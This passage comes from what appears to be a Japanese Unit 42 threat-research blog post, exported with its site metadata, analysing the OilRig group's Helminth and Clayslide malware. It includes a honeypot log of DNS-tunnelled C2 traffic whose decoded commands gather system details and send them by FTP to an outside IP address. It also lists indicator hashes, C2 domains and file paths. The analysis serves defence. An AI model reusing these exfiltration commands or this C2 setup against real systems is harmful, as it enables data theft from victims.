\u30d5\u30a1\u30a4\u30eb\u306e\u307f\u3092\u691c\u7d22\u3057\u307e\u3059\u3002\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u4e2d\u306b\u3001\u30c7\u30fc\u30bf \u30b9\u30c8\u30ea\u30fc\u30e0\u306e\u7d42\u308f\u308a\u3092\u793a\u3059\u6587\u5b57\u5217\u2018EOFEOF\u2019\u3092\u63a2\u3057\u307e\u3059\u3002<\/p>\n<p>\u2018u\u2019\u30b3\u30de\u30f3\u30c9\u306f\u3001\u63d0\u4f9b\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u307e\u305f\u306f\u30b9\u30af\u30ea\u30d7\u30c8\u304b\u3089\u751f\u6210\u3055\u308c\u305f\u30c7\u30fc\u30bf\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3081\u306b\u4f7f\u7528\u3055\u308c\u307e\u3059\u3002\u30c7\u30fc\u30bf\u306f\u3001\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u308b\u30d5\u30a1\u30a4\u30eb\u306e\u73fe\u5728\u306e\u30d0\u30a4\u30c8\u4f4d\u7f6e\u3092\u4fdd\u6301\u3059\u308b\u2018byte_position\u2019\u5909\u6570\u3092\u4f7f\u7528\u3057\u3066\u3001\u5c11\u3057\u305a\u3064\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u7279\u5b9a\u306e\u4e9c\u7a2e\u3092\u6570\u65e5\u9593\u5b9f\u884c\u3057\u305f\u3068\u3053\u308d\u3001\u30cf\u30cb\u30fc\u30dd\u30c3\u30c8\u3068\u3084\u308a\u53d6\u308a\u3059\u308b\u3088\u3046\u306b\u653b\u6483\u8005\u3092\u8a98\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3057\u305f\u3002Python\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3066\u53ce\u96c6\u3055\u308c\u305fPCAP\u3092\u89e3\u6790\u3057\u3001\u4ee5\u4e0b\u306e\u7d50\u679c\u304c\u5f97\u3089\u308c\u307e\u3057\u305f(\u7c21\u6f54\u306b\u3059\u308b\u305f\u3081\u4e00\u90e8\u5272\u611b)\u3002<\/p>\n<div>\n<pre align=\"center\" style=\"text-align: left;\" class=\"\">[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1988996938.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1404872126.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK1.txt\r\n[*] Filename: 1.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_0_840824109.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: aG9zdG5hbWU=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_8_1643283204.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: hostname\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1534172028.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK2.txt\r\n[*] Filename: 2.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_0_579093369.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: c3lzdGVtaW5mbw==\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_10_1446367320.shalaghlagh.tk |\r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: systeminfo\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1130109782.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1735654322.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK3.txt\r\n[*] Filename: 3.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_0_122829473.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_27_1524268269.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: start ftp -A 87.117.204.143\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_117849324.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_926300114.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK5.txt\r\n[*] Filename: 5.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_0_1307455992.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: \r\nd2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3\r\nlzdGVtaW5mbz4_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQg\r\nfCBmdHAgLUEgODcuMTE3LjIwNC4x\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_150_2072649310.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: NDM=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_152_1977692291.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: whoami&gt;c:\\windows\\temp\\t.txt\r\nipconfig&gt;&gt;c:\\windows\\temp\\t.txt\r\nsysteminfo&gt;&gt;c:\\windows\\temp\\t.txt\r\necho PUT c:\\windows\\temp\\t.txt | ftp -A 87.117.204.143\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_155964816.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1003791024.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK7.txt\r\n[*] Filename: 7.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_0_1649905845.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk | \r\nType: TXT\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: start ftp -A 83.142.230.138\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1205170103.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO\r\n[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_779542217.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: OK11.txt\r\n[*] Filename: 11.txt\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_0_1213525986.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE=\r\n[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_17_651256114.shalaghlagh.tk | \r\nType: TXT\r\n[+] Response TXT: EOFEOF\r\n[*] Decoded Stream: @echo off\r\necho 1\r\n[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_816831185.shalaghlagh.tk | Type: TXT\r\n[+] Response TXT: NO<\/pre>\n<\/div>\n<p>\u304a\u308f\u304b\u308a\u306e\u3068\u304a\u308a\u3001\u653b\u6483\u8005\u306b\u3088\u3063\u3066\u3001\u30ea\u30e2\u30fc\u30c8FTP\u30b5\u30fc\u30d0\u3068\u306e\u901a\u4fe1\u8a66\u884c\u3084\u3055\u307e\u3056\u307e\u306a\u5075\u5bdf\u30b3\u30de\u30f3\u30c9\u3092\u542b\u3081\u3001\u591a\u6570\u306e\u8208\u5473\u6df1\u3044\u30b3\u30de\u30f3\u30c9\u304c\u53d7\u4fe1\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306f\u3001\u4e00\u898b\u30e9\u30f3\u30c0\u30e0\u306a\u9593\u9694\u3067\u3084\u3063\u3066\u304d\u307e\u3057\u305f\u3002\u305d\u308c\u306f\u3001\u81ea\u52d5\u5316\u3055\u308c\u305f\u30b7\u30b9\u30c6\u30e0\u3067\u306f\u306a\u304f\u3001\u305d\u308c\u3089\u3092\u767a\u884c\u3057\u3066\u3044\u308b\u5b9f\u969b\u306e\u653b\u6483\u8005\u304b\u3089\u306e\u30b3\u30de\u30f3\u30c9\u3067\u3042\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h2><b>\u7d50\u8ad6<\/b><\/h2>\n<p>Helminth\u304a\u3088\u3073Clayslide\u30de\u30eb\u30a6\u30a7\u30a2 \u30d5\u30a1\u30df\u30ea\u3092\u4f7f\u7528\u3057\u3066\u3044\u308b\u653b\u6483\u8005\u306f\u3001\u5f15\u304d\u7d9a\u304d\u3001\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3055\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u3092\u4f7f\u7528\u3057\u3066\u3001\u4e16\u754c\u4e2d\u306e\u9ad8\u4fa1\u5024\u306e\u4f01\u696d\u3084\u7d44\u7e54\u3092\u6a19\u7684\u306b\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u30d6\u30ed\u30b0\u8a18\u4e8b\u3067\u8aac\u660e\u3057\u305f\u30d5\u30a1\u30a4\u30eb\u306b\u898b\u3089\u308c\u305f\u3088\u3046\u306b\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u6d3b\u767a\u306b\u958b\u767a\u3055\u308c\u3066\u304a\u308a\u3001\u7d99\u7d9a\u7684\u306b\u66f4\u65b0\u3068\u6539\u826f\u304c\u52a0\u3048\u3089\u308c\u3066\u3044\u307e\u3059\u3002\u5c0e\u5165\u3055\u308c\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u6050\u308d\u3057\u304f\u7cbe\u5de7\u306a\u308f\u3051\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u304c\u3001\u591a\u304f\u306e\u65bd\u8a2d\u3067\u6c17\u4ed8\u304b\u308c\u305a\u306b\u7559\u307e\u308b\u3053\u3068\u304c\u3067\u304d\u308bDNS\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb(C2)\u306a\u3069\u306e\u624b\u6cd5\u3092\u7528\u3044\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>Palo Alto Networks\u306e\u304a\u5ba2\u69d8\u306f\u3001\u6b21\u306e\u65b9\u6cd5\u3067\u8105\u5a01\u304b\u3089\u4fdd\u8b77\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>WildFire\u306f\u3001\u3059\u3079\u3066\u306eHelminth\u304a\u3088\u3073Clayslide\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u60aa\u610f\u306e\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u7279\u5b9a\u3057\u307e\u3059\u3002<\/li>\n<li>\u30b3\u30de\u30f3\u30c9 \u30a2\u30f3\u30c9 \u30b3\u30f3\u30c8\u30ed\u30fc\u30eb \u30b5\u30fc\u30d0\u3068\u3057\u3066\u8b58\u5225\u3055\u308c\u305f\u30c9\u30e1\u30a4\u30f3\u306f\u3001\u60aa\u610f\u3042\u308b\u3082\u306e\u3068\u3057\u3066\u30d5\u30e9\u30b0\u4ed8\u3051\u3055\u308c\u307e\u3059\u3002<\/li>\n<li>AutoFocus\u30bf\u30b0\u306e<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.Helminth\" data-page-track=\"true\" data-page-track-value=\"company:161005-unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets: section: \">Helminth<\/a>\u3068<a href=\"https:\/\/autofocus.paloaltonetworks.com\/#\/tag\/Unit42.Clayslide\" data-page-track=\"true\" data-page-track-value=\"company:161005-unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets: section: \">Clayslide<\/a>\u3092\u4f7f\u7528\u3057\u3066\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u3092\u8ffd\u8de1\u3067\u304d\u307e\u3059\u3002<\/li>\n<\/ul>\n<h3><b>\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u4fb5\u5bb3\u306e\u5146\u5019<\/b><\/h3>\n<p style=\"padding-left: 40px;\">F04CF9361CF46BFF2F9D19617BBA577EA5F3AD20EA76E1F7E159701E446364FC<br \/>\nE2EC7FA60E654F5861E09BBE59D14D0973BD5727B83A2A03F1CECF1466DD87AA<br \/>\n31DB0841C3975BE5395F13C894B7E444D150CC701487B756FFF43CE78D98B1E6<br \/>\nC3C17383F43184A29F49F166A92453A34BE18E51935DDBF09576A60441440E51<br \/>\nC6437F57A8F290B5EC46B0933BFA8A328B0CB2C0C7FBEEA7F21B770CE0250D3D<br \/>\n5A2C38BE89AC878D28080A7465C4A3F8708FB414B811511B9D5AE61A47593A69<br \/>\nBD0920C8836541F58E0778B4B64527E5A5F2084405F73EE33110F7BC189DA7A9<br \/>\n90639C7423A329E304087428A01662CC06E2E9153299E37B1B1C90F6D0A195ED<br \/>\n528D432952EF879496542BC62A5A4B6EEE788F60F220426BD7F933FA2C58DC6B<br \/>\n3772D473A2FE950959E1FD56C9A44EC48928F92522246F75F4B8CB134F4713FF<br \/>\nF3856C7AF3C9F84101F41A82E36FC81DFC18A8E9B424A3658B6BA7E3C99F54F2<br \/>\n0CD9857A3F626F8E0C07495A4799C59D502C4F3970642A76882E3ED68B790F8E<br \/>\n80161DAD1603B9A7C4A92A07B5C8BCE214CF7A3DF897B561732F9DF7920ECB3E<br \/>\nD874F513A032CCB6A5E4F0CD55862B024EA0BEE4DE94CCF950B3DD894066065D<br \/>\n5E9DDB25BDE3719C392D08C13A295DB418D7ACCD25D82D020B425052E7BA6DC9<br \/>\n299BC738D7B0292820D99028289280BA24D7FB985851D9C74060AF7950CECEF0<br \/>\n2E226A0210A123AD828803EB871B74ECBDB702FC4BABD9FF786231C486FF65E0<br \/>\nF1DE7B941817438DA2A4B7284BC56C291DB7312E3BA5E2397B3621811A816AA3<br \/>\n65920EAEA00764A245ACB58A3565941477B78A7BCC9EFAEC5BF811573084B6CF<br \/>\n742A52084162D3789E196FB5FF6F8E2983147CD914088BD5F9ED363D7A5B0DF0<br \/>\n4E5B85EA68BF8F2306B6B931810AE38C8DFF3679D78DA1AF2C91032C36380353<br \/>\n36D4B4B018EC78A79F3C06DC30EC77C250307628A7631F6B5B5995E797D0674F<br \/>\n005DDE45A6F1D9B2A254E71F89F12AB0DFAAA48D081F5C0A434800BD5C327086<br \/>\n2C4BCAB135BF1846684B598E66E3F51443F70F9E8D0544F3417774CBE907E8EF<br \/>\nC4FBC723981FC94884F0F493CB8711FDC9DA698980081D9B7C139FCFFBE723DA<br \/>\nCFFC694ACE3E1547007AE00437536F2A88BA60179C51F23228E696FB02AFDC86<br \/>\n0B9437DD87A3C24ED7D200F9B870D69F9B7AD918C51325C11444DF8BC6FB97BA<br \/>\n903B6D948C16DC92B69FE1DE76CF64AB8377893770BF47C29BF91F3FD987F996<br \/>\n8BFBB637FE72DA5C9AEE9857CA81FA54A5ABE7F2D1B061BC2A376943C63727C7<br \/>\n9C0A33A5DC62933F17506F20E0258F877947BDCD15B091A597EAC05D299B7471<br \/>\n93940B5E764F2F4A2D893BEBEF4BF1F7D63C4DB856877020A5852A6647CB04A0<br \/>\n0EC288AC8C4AA045A45526C2939DBD843391C9C75FA4A3BCC0A6D7DC692FDCD1<br \/>\n089BF971E8839DB818AC462F53F82DAED523C413BFC2E01FB76DD70B37162AFE<br \/>\nD808F3109822C185F1D8E1BF7EF7781C219DC56F5906478651748F0ACE489D34<br \/>\n3986D54B00647B507B2AFD708B7A1CE4C37027FB77D67C6BC3C20C3AC1A88CA4<br \/>\n1B2FEE00D28782076178A63E669D2306C37BA0C417708D4DC1F751765C3F94E1<br \/>\n662C53E69B66D62A4822E666031FD441BBDFA741E20D4511C6741EC3CB02475F<br \/>\nF5A64DE9087B138608CCF036B067D91A47302259269FB05B3349964CA4060E7E<br \/>\nA787C0E42608F9A69F718F6DCA5556607BE45EC77D17B07EB9EA1E0F7BB2E064<br \/>\n4B5112F0FB64825B879B01D686E8F4D43521252A3B4F4026C9D1D76D3F15B281<br \/>\n3AF6DFA4CEBD82F48B6638A9757730810707D79D961DDE1B72D3768E972E6184<\/p>\n<h4><b>C2\u30b5\u30fc\u30d0<\/b><\/h4>\n<p style=\"padding-left: 40px;\">shalaghlagh[.]tk<br \/>\ngo0gIe[.]com<br \/>\nwinodwsupdates[.]me<br \/>\nupdate-kernal[.]net<br \/>\ngoogleupdate[.]download<br \/>\nyahoooooomail[.]com<br \/>\nupgradesystems[.]info<\/p>\n<h4><b>\u30d5\u30a1\u30a4\u30eb\u306e\u30d1\u30b9<\/b><\/h4>\n<p style=\"padding-left: 40px;\">%PUBLIC%\/Libraries\/dn<br \/>\n%PUBLIC%\/Libraries\/up<br \/>\n%USERPROFILE%\/AppData\/Local\/Microsoft\/Media\/up<br \/>\n%USERPROFILE%\/AppData\/Local\/Microsoft\/Media\/dn<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 \u6700\u521d\u306b\u516c\u958b\u3057\u305f2016\u5e745\u6708\u306b\u304a\u3051\u308bOilRig\u653b\u6483\u6d3b\u52d5\u306e\u5206\u6790\u4ee5\u6765\u3001\u79c1\u305f\u3061\u306f\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306e\u65b0\u305f\u306a\u6d3b\u52d5\u306b\u3064\u3044\u3066\u76e3\u8996\u3092\u7d9a\u3051\u3066\u304d\u307e\u3057\u305f\u3002\u6700\u8fd1\u306e\u6570\u9031\u9593\u306b\u304a\u3044\u3066\u3001\u88ab\u5bb3\u8005\u306b\u5bfe\u3057\u3066\u7528\u3044\u3089\u308c\u308bHelminth\u30d0\u30c3\u30af\u30c9\u30a2\u3060\u3051\u3067\u306a\u304fC<\/p>\n","protected":false},"author":21,"featured_media":103240,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,1974,4428],"tags":[7181,6739,6271,7182,4587],"product_categories":[],"coauthors":[933,935],"class_list":["post-106117","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-malware-ja","category-threat-research-ja","tag-clayside-ja","tag-helminth-ja","tag-oilrig-ja","tag-oilrig-attacks","tag-spear-phishing-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927<\/title>\n<meta name=\"description\" content=\"\u6982\u8981\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927\" \/>\n<meta property=\"og:description\" content=\"\u6982\u8981\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2016-10-04T20:10:37+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-08T08:48:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"650\" \/>\n\t<meta property=\"og:image:height\" content=\"300\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Josh Grunzweig, Robert Falcone\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","description":"\u6982\u8981","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","og_locale":"ja_JP","og_type":"article","og_title":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","og_description":"\u6982\u8981","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","og_site_name":"Unit 42","article_published_time":"2016-10-04T20:10:37+00:00","article_modified_time":"2020-04-08T08:48:28+00:00","og_image":[{"width":650,"height":300,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","type":"image\/jpeg"}],"author":"Josh Grunzweig, Robert Falcone","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/"},"author":{"name":"Josh Grunzweig","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/946b9392c26b4a1a91f6e4eeb2889600"},"headline":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","datePublished":"2016-10-04T20:10:37+00:00","dateModified":"2020-04-08T08:48:28+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/"},"wordCount":884,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","keywords":["Clayside","Helminth","OilRig","OilRig attacks","Spear Phishing"],"articleSection":["Threat Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","name":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","datePublished":"2016-10-04T20:10:37+00:00","dateModified":"2020-04-08T08:48:28+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/946b9392c26b4a1a91f6e4eeb2889600"},"description":"\u6982\u8981","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","width":650,"height":300},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/946b9392c26b4a1a91f6e4eeb2889600","name":"Josh Grunzweig","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Josh Grunzweig"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/joshgruznweig\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/21"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=106117"}],"version-history":[{"count":3,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106117\/revisions"}],"predecessor-version":[{"id":106119,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106117\/revisions\/106119"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/103240"}],"wp:attachment":[{"href":"ht